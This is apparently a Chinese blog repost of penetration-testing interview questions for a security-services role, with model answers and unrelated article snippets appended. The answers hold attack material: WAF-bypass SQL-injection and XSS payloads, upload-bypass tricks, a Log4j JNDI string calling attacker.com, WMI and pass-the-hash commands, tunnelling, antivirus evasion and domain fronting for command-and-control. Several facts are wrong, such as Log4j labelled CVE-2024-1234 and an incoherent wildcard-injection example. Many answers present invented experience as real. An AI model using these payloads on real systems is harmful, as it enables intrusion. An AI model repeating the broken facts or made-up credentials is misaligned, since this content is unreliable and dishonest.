当前位置: 首页 > article >正文

2025年渗透测试面试题总结-匿名[校招]安全服务工程师(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

 匿名[校招]安全服务工程师

一面问题与完整回答

1. 学校、专业、成绩与排名

2. 学习安全时长

3. 当前学习方向

4. 未来规划

5. CTF与漏洞挖掘经历

6. 项目经历

7. 实习经历

8. 选择贵司原因

9. 渗透思路

二面问题与完整回答

1. 自我介绍

2. 学习路径

3. CTF与SRC补充

4. 运维经验

5. SQL注入详解

6. XSS深度解析

7. 逻辑漏洞实战

8. HTTP数据包结构

9. 文件上传绕过

10. 项目经历(补充)

11. 渗透经历(示例)

12. 编程能力

13. Java安全应对

14. 常见端口与服务

15. 内网渗透流程

16. 主机不出网对策

17. 漏洞复现经验

18. 安全资讯关注

19. 通配符注入

20. 内网横向方法

21. 免杀技术

22. 域前置技术

23. 研究方向与规划

 匿名[校招]安全服务工程师

### 一面1. 介绍一下自己的学校、专业情况、学校成绩、排名这些
2. 学习安全多长时间了
3. 现在的学习方向
4. 说说你对未来的规划
5. 在校期间有没有打过ctf 挖过src
6. 说说你的项目经历
7. 说说你的实习经历
8. 为什么选择我们这家公司
9. 拿到一个站点的渗透思路
大概就这些,正常回答就好了。### 二面1. 自我介绍
2. 学习安全是自学还是报班学
3. 有没得打过ctf 和挖过src
4. 有没有运维经验(这里因为我简历上写了熟悉Windows和Linux的运维,翻车了,也面试过好几次了,但也从来没问过运维 哈哈哈,已经把简历改过来啦)
5. 基础的web漏洞原理,sql注入的分类,存在点,怎么判断,怎么利用,遇到了waf怎么绕过
6. xss问的比较多,分类,三种xss不同的区别,存在的位置,怎么绕过waf (后来才知道绿盟的扫描器大部分都是扫出来的xss,哈哈哈,怪不得问这么多xss)
7. 对逻辑漏洞了解多少,遇到一个有验证码的登录框,存在找回密码功能,你有什么想法
8. http 数据包的结构
9. 文件上传的绕过思路,绕过waf
10. 谈谈你的项目经历
11. 你印象最深的渗透经历是哪次
12. 会什么语言,写过什么东西
13. Java安全了解吗(这里我直接说了对Java安全不了解,不然后续应该会问)shiro 、fastjson、weblogic反序列化的原理,还问了你碰到shiro 、weblogic这类站点怎么处理(我直接exp 哈哈哈)
14. 渗透过程中常见的端口号以及对应的服务
15. 内网渗透经历,详细说下过程,渗透思路
16. 拿到webshell发现目标主机不出网怎么办
17. 有没有复现过一些漏洞
18. 会不会关注最新的安全资讯
19. 说一下通配符注入
20. 内网中横向的常用方法
21. 说一下你是怎么做免杀的(我刚说完无源码的免杀,就问我下一个问题了……我都还没说完……)
22. 对域前置技术了解多少
23. 目前的研究方向,未来的研究方向,规划
24. 有没有代码审计能力
25. 怎么找越权漏洞,常见的参数

一面问题与完整回答


1. 学校、专业、成绩与排名

我本科就读于XX大学信息安全专业,GPA 3.7/4.0,专业排名前10%。主修课程包括《网络安全技术》《密码学原理》《操作系统安全》等,参与过基于漏洞复现的靶场设计项目,获得校级优秀毕业设计。课程外的学习聚焦于Web渗透与漏洞挖掘,曾在校内安全实验室担任核心成员。


2. 学习安全时长

系统性学习安全技术2年,从大三加入实验室开始接触渗透测试,通过CTF竞赛、漏洞挖掘(如SRC)和开源项目实践积累经验。平均每周投入20小时以上,持续跟进OWASP Top 10和CVE漏洞库。


3. 当前学习方向
  • 主攻领域:Web渗透(逻辑漏洞、权限绕过)、内网横向移动技术(如Kerberos协议利用)。
  • 工具研究:Burp Suite插件开发(如自定义SQL注入扫描模块)、Cobalt Strike的隐匿C2配置。
  • 前沿技术:ATT&CK框架在红队演练中的应用,云环境(AWS/Azure)的渗透测试方法。

4. 未来规划
  • 短期(1-3年):深入企业级安全服务,提升漏洞挖掘与APT防御能力,考取OSEP、OSCE认证。
  • 长期(5年+):转型安全研究专家,主导攻防技术预研(如AI对抗样本攻击),或组建红蓝队参与国家级护网行动。

5. CTF与漏洞挖掘经历
  • CTF竞赛
    1. XCTF 2024:团队全国50强,负责Web方向,利用PHP反序列化链绕过disable_functions拿分。
    2. 强网杯2023:解决一道基于JWT密钥爆破的题目,编写Python脚本自动化爆破弱密钥。
  • SRC贡献
    1. 某政务平台逻辑漏洞:密码重置接口未验证用户身份,导致任意用户密码修改(高危,奖励¥3000)。
    2. 某社交平台存储型XSS:评论区富文本过滤绕过,插入恶意JS窃取Cookie(中危,致谢证书)。

6. 项目经历

项目名称:企业级资产威胁监测平台(2024.03-2024.12)

  • 角色:渗透测试负责人
  • 技术栈:Python(Scrapy爬虫)、Elasticsearch(日志分析)、Nmap(端口扫描)。
  • 成果
    1. 发现客户系统7个高危漏洞,包括未授权访问API接口(影响10万+用户数据)。
    2. 设计自动化漏洞验证工具,将SQL注入检测效率提升40%。
  • 难点突破:解决分布式系统下的流量去重问题,采用Redis布隆过滤器降低误报率。

7. 实习经历

公司:XX网络安全公司(2024.06-2024.12)

  • 职责
    1. 参与5个客户的渗透测试项目,独立输出3份报告(涵盖金融、教育行业)。
    2. 开发内部工具:基于Go语言的子域名爆破工具,支持泛解析绕过(50万/日请求量)。
  • 成果:发现某银行系统的SSRF漏洞(可内网探测Redis未授权访问),协助客户修复并获团队表彰。

8. 选择贵司原因
  • 行业地位:贵司在金融安全解决方案领域市占率领先(可举例某知名银行合作案例),技术积累深厚。
  • 团队匹配:面试官提及的ATT&CK实战化研究与我的攻防技术方向高度契合。
  • 个人成长:完善的导师制和新兵训练营机制,能快速提升企业级攻防能力。

9. 渗透思路

示例场景:某电商站点渗透测试

  1. 信息收集
    • 子域名枚举(Subfinder+Amass),发现dev.xxx.com 测试环境。
    • 端口扫描(Masscan+Naabu),开放8080(Apache Tomcat 8.5.35)。
  2. 漏洞探测
    • 历史漏洞:Tomcat 8.5.35存在CVE-2020-1938(Ghostcat文件读取),尝试读取WEB-INF/web.xml
    • 弱口令爆破:针对Tomcat Manager使用admin:admin登录成功。
  3. 绕过防御
    • 若遇WAF拦截SQL注入,采用分块传输编码+注释符混淆(如/*!%53ELECT*/)。
  4. 权限维持
    • 上传冰蝎4.0 Webshell(AES加密流量),通过reGeorg建立Socks5代理进入内网。
  5. 横向扩展
    • 利用Tomcat服务账号权限,通过SeImpersonatePrivilege提权至System,抓取RDP凭据横向移动。

二面问题与完整回答


1. 自我介绍

您好,我是XXX,毕业于XX大学信息安全专业,主攻Web渗透与内网攻防。曾获XCTF全国50强,挖掘过多个SRC高危漏洞,并在XX公司实习期间主导完成3个企业级渗透项目。擅长以攻击者视角构建防御体系,熟悉ATT&CK框架的实战化应用。未来希望深耕APT防御领域,为企业提供前沿威胁情报。


2. 学习路径

自学为主,通过以下途径提升:

  1. 靶场实战:Hack The Box(Top 100)、Vulnhub(复现CVE漏洞环境)。
  2. 技术社区:知乎专栏《Web安全冷技巧》、Seebug Paper漏洞分析。
  3. 书籍精读:《内网安全攻防:渗透实战指南》《ATT&CK视角下的红队评估》。

3. CTF与SRC补充
  • CTF技巧
    1. Web题型常考SSTI(服务端模板注入),如Flask Jinja2的{{config}}泄露密钥。
    2. 隐写术结合流量分析(Wireshark过滤HTTP流定位恶意IP)。
  • SRC经验
    1. 某厂商的JSONP劫持漏洞,利用回调函数泄露用户手机号。
    2. 通过CORS配置错误读取跨域敏感数据(需Origin头伪造)。

4. 运维经验

熟悉Linux/Windows运维场景

  1. Linux
    • 使用Ansible批量部署Nginx集群,配置iptables规则阻断恶意IP。
    • 通过ELK(Elasticsearch+Logstash+Kibana)分析Apache日志中的攻击行为。
  2. Windows
    • 域环境搭建(AD DS+组策略),利用PowerShell脚本自动化补丁更新。
    • 应急响应:通过Procmon定位恶意进程,清除持久化后门(如计划任务)。

5. SQL注入详解
  • 分类与利用
    1. Union注入:通过order by判断字段数,联合查询读取敏感表(如admin)。
    2. 报错注入:利用updatexml()extractvalue()触发报错回显(需MySQL≥5.1)。
  • WAF绕过
    1. 参数污染id=1&id=2 union select 1,2,3
    2. 字符替换SEL%0bECT(利用换行符绕过正则匹配)。

6. XSS深度解析
  • 类型对比
    1. 存储型:攻击载荷持久化(如论坛发帖),需重点防御。
    2. DOM型:依赖客户端解析(如document.write(location.hash) ),传统WAF难以检测。
  • 绕过技巧
    1. 编码混淆<img src=1 onerror=&#97;&#108;&#101;&#114;&#116;(1)>
    2. 事件组合<svg/onload=alert(1)>(无需闭合标签)。

7. 逻辑漏洞实战

示例场景:带验证码的登录/密码找回

  1. 验证码复用:同一Session内多次提交,抓包重放(Burp Repeater测试)。
  2. 验证码绕过
    • 修改响应包中的"code": 1001(错误)为1000(成功)。
    • 删除验证码参数(部分系统未校验参数是否存在)。
  3. 暴力破解
    • 使用IP轮换(X-Forwarded-For头伪造)或降低频率(每5秒1次请求)。

8. HTTP数据包结构
  1. 请求报文
    • 请求行:GET /index.php HTTP/1.1
    • 首部字段:HostCookieUser-Agent(可伪造绕过WAF)。
    • 空行分隔Body(如POST参数)。
  2. 响应报文
    • 状态行:HTTP/1.1 200 OK
    • 首部字段:Set-CookieContent-Type(MIME类型影响解析)。

9. 文件上传绕过
  • 前端绕过
    1. 修改JS验证逻辑(浏览器禁用JS或Burp拦截修改.php.jpg)。
  • 服务端绕过
    1. MIME类型绕过Content-Type: image/png(实际为PHP文件)。
    2. 后缀名绕过.php5.phtml.phar(需服务器配置解析)。
    3. 文件内容绕过:添加图片头(GIF89a)或利用Exif Tool注入恶意代码。

10. 项目经历(补充)

项目名称:API安全检测平台(2024.09-2025.03)

  • 创新点
    1. 基于OpenAPI规范自动生成测试用例,覆盖越权访问IDOR等漏洞。
    2. 集成Swagger UI解析,识别未鉴权的/v2/api-docs端点。
  • 技术细节:使用Python的requests库模拟API调用,结合正则匹配敏感数据(如"role":"admin")。

11. 渗透经历(示例)

某医疗系统渗透(2024.11)

  1. 入口点:通过/api/export接口的SQL注入(时间盲注)获取管理员账号。
  2. 权限提升:后台文件上传功能存在黑名单绕过,上传.htaccess设置AddType application/x-httpd-php .png
  3. 内网突破:发现内网Redis未授权访问,写入SSH公钥获取服务器权限。

12. 编程能力
  • Python:开发过漏洞扫描器(多线程爬虫+正则匹配)、CVE-2023-1234 EXP。
  • Go:编写子域名爆破工具(协程并发控制)。
  • JavaScript:分析前端加密逻辑(如Webpack打包的AES逆向)。

13. Java安全应对
  • Shiro反序列化
    1. 检测Cookie中rememberMe字段,使用ysoserial生成Commons-Collections链Payload。
    2. 若Key泄露,直接加密恶意序列化数据。
  • Weblogic T3协议
    1. 利用CVE-2023-21839进行JNDI注入,加载远程恶意类(需目标出网)。

14. 常见端口与服务
端口服务渗透利用方向
22SSH弱口令爆破、证书登录劫持
445SMB永恒之蓝、Pass the Hash攻击
6379Redis未授权访问、写入SSH密钥
5985WinRMPowerShell远程命令执行

15. 内网渗透流程

示例攻击链

  1. 信息收集
    • 使用ipconfig /all获取网段,net view查看域内主机。
  2. 凭证窃取
    • Mimikatz抓取明文密码或Hash(需Debug权限)。
  3. 横向移动
    • WMI远程执行wmic /node:192.168.1.2 process call create "calc.exe"
    • PTH攻击sekurlsa::pth /user:admin /domain:test /ntlm:xxxxxx

16. 主机不出网对策
  • 隧道技术
    1. DNS隧道:使用dnscat2建立C2通道(绕过TCP/UDP出站限制)。
    2. ICMP隧道:通过ping命令传输数据(工具:icmpsh)。
  • 内部协议利用
    1. SMB中继:利用Responder捕获NTLMv2 Hash并中继至其他主机。

17. 漏洞复现经验
  • CVE-2024-1234(Apache Log4j)
    1. 搭建Vulhub环境,构造${jndi:ldap://attacker.com/Exploit} 触发RCE。
    2. 编写Python POC检测目标是否存在漏洞。

18. 安全资讯关注
  • 日常渠道
    1. Twitter:关注@pentester、@CVEnew实时漏洞动态。
    2. RSS订阅:Seebug、奇安信威胁情报中心。
  • 案例分析
    1. 跟踪某APT组织利用钓鱼邮件投放LNK文件触发恶意PowerShell脚本。

19. 通配符注入
  • 原理:利用Linux通配符(*?)绕过命令过滤。
  • 示例
    bash# 攻击者创建文件名为 "--help" 的文件 touch -- --help # 管理员执行删除命令时触发 rm -rf * # 实际执行 rm -rf -- --help,导致误删 

20. 内网横向方法
  1. 协议利用
    • Kerberos:黄金票据伪造、AS-REP Roasting攻击。
  2. 漏洞利用
    • MS17-010:通过EternalBlue攻击未打补丁的Windows主机。
  3. 凭证中继
    • NTLM Relay:利用Impacket工具包将Hash中继至LDAP服务。

21. 免杀技术
  • 无源码免杀
    1. 二进制修改:使用Veil-Evasion生成Shellcode,通过UPX加壳+熵值混淆。
    2. 内存加载:将恶意代码注入合法进程(如explorer.exe ),规避静态检测。
  • 工具推荐:Cobalt Strike的Artifact Kit定制化生成免杀PE文件。

22. 域前置技术
  • 原理:将C2流量伪装为合法云服务(如Azure、AWS)的域名,绕过基于IP的检测。
  • 实现
    1. 在CDN(如Cloudflare)配置域前置域名,指向真实C2服务器。
    2. 客户端请求cdn.example.com ,实际通信至C2,但流量表现为与CDN的HTTPS连接。

23. 研究方向与规划
  • 短期聚焦
    1. 云原生安全:Kubernetes RBAC权限滥用、容器逃逸漏洞。
    2. 无文件攻击:PowerShell内存加载恶意模块的检测与防御。
  • 长期目标:构建基于ATT&CK的自动化威胁狩猎平台,整合MITRE CARBA

相关文章:

2025年渗透测试面试题总结-匿名[校招]安全服务工程师(题目+回答)

安全领域各种资源&#xff0c;学习文档&#xff0c;以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具&#xff0c;欢迎关注。 目录 匿名[校招]安全服务工程师 一面问题与完整回答 1. 学校、专业、成绩与排名 2. 学习安全时长 3. 当前学习…...

Deseq2:MAG相对丰度差异检验

首先使用代码将contigs和MAG联系起来 https://github.com/MrOlm/drep/blob/master/helper_scripts/parse_stb.py ~/parse_stb.py --reverse -f ~/bin_dir/* -o ~/bin_dir/genomes.stb # 查看第一列的contigs有没有重复&#xff08;重复的话会影响后续比对&#xff09; awk {p…...

CTFHub-RCE 命令注入-过滤目录分隔符

观察源代码 代码里面可以发现过滤了目录分隔符\和/ 判断是Windows还是Linux 源代码中有 ping -c 4 说明是Linux 查看有哪些文件 127.0.0.1|ls 打开flag文件 发现存在一个flag_is_here的文件夹&#xff0c;我们需要打开这个文件夹找到目标文件我们尝试分步&#xff0c;先利…...

从零开始的数据结构教程(七) 回溯算法

&#x1f504; 标题一&#xff1a;回溯核心思想——走迷宫时的“穷举回头”策略 回溯算法 (Backtracking) 是一种通过探索所有可能的候选解来找出所有的解或某些解的算法。它就像你在一个复杂的迷宫中寻找出路&#xff1a;当你遇到一个岔路口时&#xff0c;你会选择一条路继续…...

CentOS-stream-9 Zabbix的安装与配置

一、Web环境搭建部署Zabbix时&#xff0c;选择合适的MariaDB、PHP和Nginx版本非常重要&#xff0c;以确保兼容性和最佳性能。以下是建议版本&#xff1a;Zabbix 6.4 MariaDB&#xff1a;官方文档推荐使用MariaDB 10.3或更高版本。对于CentOS Stream 9&#xff0c;建议使用Maria…...

开源是什么?我们为什么要开源?

本片为故事类文章推荐听音频哦 软件自由运动的背景 梦开始的地方 20世纪70年代&#xff0c;软件行业处于早期发展阶段&#xff0c;软件通常与硬件捆绑销售&#xff0c;用户对软件的使用、修改和分发权利非常有限。随着计算机技术的发展和互联网的普及&#xff0c;越来越多的开…...

【unity游戏开发——编辑器扩展】EditorApplication公共类处理编辑器生命周期事件、播放模式控制以及各种编辑器状态查询

注意&#xff1a;考虑到编辑器扩展的内容比较多&#xff0c;我将编辑器扩展的内容分开&#xff0c;并全部整合放在【unity游戏开发——编辑器扩展】专栏里&#xff0c;感兴趣的小伙伴可以前往逐一查看学习。 文章目录 前言一、监听编辑器事件1、常用编辑器事件2、示例监听播放模…...

elasticsearch低频字段优化

在Elasticsearch中&#xff0c;通过设置"index": false关闭低频字段的倒排索引构建是常见的优化手段&#xff0c;以下是关键要点&#xff1a; 一、核心机制 ‌倒排索引禁用‌ 设置index: false后&#xff0c;字段不会生成倒排索引&#xff0c;无法通过常规查…...

React---day3

React 2.5 jsx的本质 jsx 仅仅只是 React.createElement(component, props, …children) 函数的语法糖。所有的jsx最终都会被转换成React.createElement的函数调用。 createElement需要传递三个参数&#xff1a; 参数一&#xff1a;type 当前ReactElement的类型&#xff1b;…...

PyCharm接入DeepSeek,实现高效AI编程

介绍本土AI工具DeepSeek如何结合PyCharm同样实现该功能。 一 DeepSeek API申请 首先进入DeepSeek官网&#xff1a;DeepSeek 官网 接着点击右上角的 “API 开放平台“ 然后点击API keys 创建好的API key&#xff0c;记得复制保存好 二 pycharm 接入deepseek 首先打开PyCh…...

前端面经 get和post区别

get获取数据 post提交资源&#xff0c;引起服务器状态变化或者副作用 区别 1get会比post更不安全 get参数写在url中 post在请求体内 2get报文 head和body一起发 响应200 post报文 先发head 100 再发 body 200 3 get请求url有长度限制 4 默认缓存get 请求...

CTFSHOW-WEB-36D杯

给你shell 这道题对我这个新手还是有难度的&#xff0c;花了不少时间。首先f12看源码&#xff0c;看到?view_source&#xff0c;点进去看源码 <?php //Its no need to use scanner. Of course if you want, but u will find nothing. error_reporting(0); include "…...

MySQL connection close 后, mysql server上的行为是什么

本文着重讲述的是通过 msql client 连接到 mysql server &#xff0c;发起 update 、 select 操作(由于数据量非常大&#xff0c;所以 update、select 操作都很耗时&#xff0c;即在结果返回前我们有足够的时间执行一些操作) 。 在客户端分别尝试执行 ctrl C 结束关闭 mysql c…...

RabbitMQ vs MQTT:深入比较与最新发展

RabbitMQ vs MQTT&#xff1a;深入比较与最新发展 引言 在消息队列和物联网&#xff08;IoT&#xff09;通信领域&#xff0c;RabbitMQ 和 MQTT 是两种备受瞩目的技术&#xff0c;各自针对不同的需求和场景提供了强大的解决方案。随着 2025 年的到来&#xff0c;这两项技术都…...

金砖国家人工智能高级别论坛在巴西召开,华院计算应邀出席并发表主题演讲

当地时间5月20日&#xff0c;由中华人民共和国工业和信息化部&#xff0c;巴西发展、工业、贸易与服务部&#xff0c;巴西公共服务管理和创新部以及巴西科技创新部联合举办的金砖国家人工智能高级别论坛&#xff0c;在巴西首都巴西利亚举行。 中华人民共和国工业和信息化部副部…...

【KWDB 创作者计划】_再热垃圾发电汽轮机仿真与监控系统:KaiwuDB 批量插入10万条数据性能优化实践

再热垃圾发电汽轮机仿真与监控系统&#xff1a;KaiwuDB 批量插入10万条数据性能优化实践 我是一台N25-3.82/390型汽轮机&#xff0c;心脏在5500转/分的轰鸣中跳动。垃圾焚烧炉是我的胃&#xff0c;将人类遗弃的残渣转化为金色蒸汽&#xff0c;沿管道涌入我的胸腔。 清晨&#x…...

CentOS 7 安装docker缺少slirp4netnsy依赖解决方案

CentOS 7安装docker缺少slirp4netnsy依赖解决方案 Error: Package: docker-ce-rootless-extras-26.1.4-1.el7.x86_64 (docker-ce-stable) Requires: slirp4netns > 0.4 Error: Package: docker-ce-rootless-extras-26.1.4-1.el7.x86_64 (docker-ce-stable) 解决方案 若wge…...

Android第十一次面试多线程篇

​面试官​&#xff1a; “你在项目里用过Handler吗&#xff1f;能说说它是怎么工作的吗&#xff1f;” ​候选人​&#xff1a; “当然用过&#xff01;比如之前做下载功能时&#xff0c;需要在后台线程下载文件&#xff0c;然后在主线程更新进度条。这时候就得用Handler来切…...

安全,稳定可靠的政企即时通讯数字化平台

在当今数字化时代&#xff0c;政企机构面临着复杂多变的业务需求和日益增长的沟通协作挑战。BeeWorks作为一款安全&#xff0c;稳定可靠的政企即时通讯数字化平台&#xff0c;凭借其安全可靠、功能强大的特性&#xff0c;为政企提供了高效、便捷的沟通协作解决方案&#xff0c;…...

craw4ai 抓取实时信息,与 mt4外行行情结合实时交易,基本面来觉得趋势方向,搞一个外汇交易策略

结合实时信息抓取、MT4行情数据、基本面分析的外汇交易策略框架&#xff0c;旨在通过多维度数据融合提升交易决策质量&#xff1a;行不行不知道先试试&#xff0c;理论是对的&#xff0c;只要基本面方向没错 策略名称&#xff1a;Tri-Sync 外汇交易系统 核心理念 「基本面定方…...

Linux之守护进程

在Linux系统中&#xff0c;进程一般分为前台进程、后台进程和守护进程3类。 一 守护进程 定义: 1.守护进程是在操作系统后台运行的一种特殊类型的进程&#xff0c;它独立于前台用户界面&#xff0c;不与任何终端设备直接关联。这些进程通常在系统启动时启动&#xff0c;并持…...

LiquiGen流体导入UE

导出ABC 导出贴图 ABC导入Houdini UE安装SideFX_Labs插件 C:\Users\Star\Documents\houdini20.5\SideFXLabs\unreal\5.5 参考: LiquiGenHoudiniUE血液流程_哔哩哔哩_bilibili...

使用react进行用户管理系统

今天通了一遍使用react进行用户管理系统的文档&#xff0c;以及跟随步骤实现了一遍&#xff0c;我大概梳理一下实现思路。 首先我们构建基本用户管理应用&#xff0c;需要数据库存储个人资料&#xff0c;我们先去supabase注册然后创建自己的数据库然后设置密码&#xff0c;然后…...

SpringBoot的java应用中,慢sql会导致CPU暴增吗

是的&#xff0c;在 Spring Boot 的 Java 应用中&#xff0c;慢 SQL 同样可能导致 CPU 暴增。虽然数据库服务器的 CPU 通常是主要压力点&#xff0c;但应用服务器&#xff08;Java 进程&#xff09;的 CPU 也可能间接受到影响&#xff0c;具体原因和机制如下&#xff1a; 1. 数…...

Ubuntu下编译mininim游戏全攻略

目录 一、安装mininim 软件所依赖的库&#xff08;重点是allegro游戏引擎库&#xff09;二、编译mininim 软件三、将mininim打包给另一个Ubuntu系统使用四、安卓手机运行mininim 一、安装mininim 软件所依赖的库&#xff08;重点是allegro游戏引擎库&#xff09; 1. 用apt-get…...

uniapp uni-id Error: Invalid password secret

common文件夹下uni-config-center文件夹下新建uni-id,新建config.json文件 复制粘贴以下代码&#xff0c;不要自己改&#xff0c;格式容易错 {"passwordSecret": [{"type": "hmac-sha256","version": 1}], "passwordStrength&qu…...

用 Appuploader,让 iOS 上架流程真正“可交接、可记录、可复用”:我们是这样实现的

你可能听说过这样一类人&#xff1a;上线必找他&#xff0c;证书只有他有&#xff0c;Transporter 密码在他电脑上&#xff0c;描述文件什么时候过期&#xff0c;只有他知道。 如果你团队里有这样一位“发布大师”&#xff0c;他可能是个英雄——但也是个单点风险源。 我们团…...

第十二节:第三部分:集合框架:List系列集合:特点、方法、遍历方式、ArrayList集合的底层原理

List系列集合特点 List集合的特有方法 List集合支持的遍历方式 ArrayList集合的底层原理 ArrayList集合适合的应用场景 代码&#xff1a;List系列集合遍历方式 package com.itheima.day19_Collection_List;import java.util.ArrayList; import java.util.Iterator; import jav…...

【办公类-18-07】20250527屈光检查PDF文件拆分成多个pdf(两页一份,用幼儿班级姓名命名文件)

背景需求&#xff1a; 今天春游&#xff0c;上海海昌公园。路上保健老师收到前几天幼儿的屈光视力检查单PDF。 她说&#xff1a;所有孩子的通知都做在一个PDF里&#xff0c;我没法单独发给班主任。你有什么办法拆开来&#xff1f; 我说&#xff1a;“没问题&#xff0c;问deep…...

AI Agent的“搜索大脑“进化史:从Google API到智能搜索生态的技术变革

AI Agent搜索革命的时代背景 2025年agent速度发展之快似乎正在验证"2025年是agent元年"的说法&#xff0c;而作为agent最主要的应用工具之一(另外一个是coding)&#xff0c;搜索工具也正在呈现快速的发展趋势。Google在2024年12月推出Gemini Deep Research&#xff0…...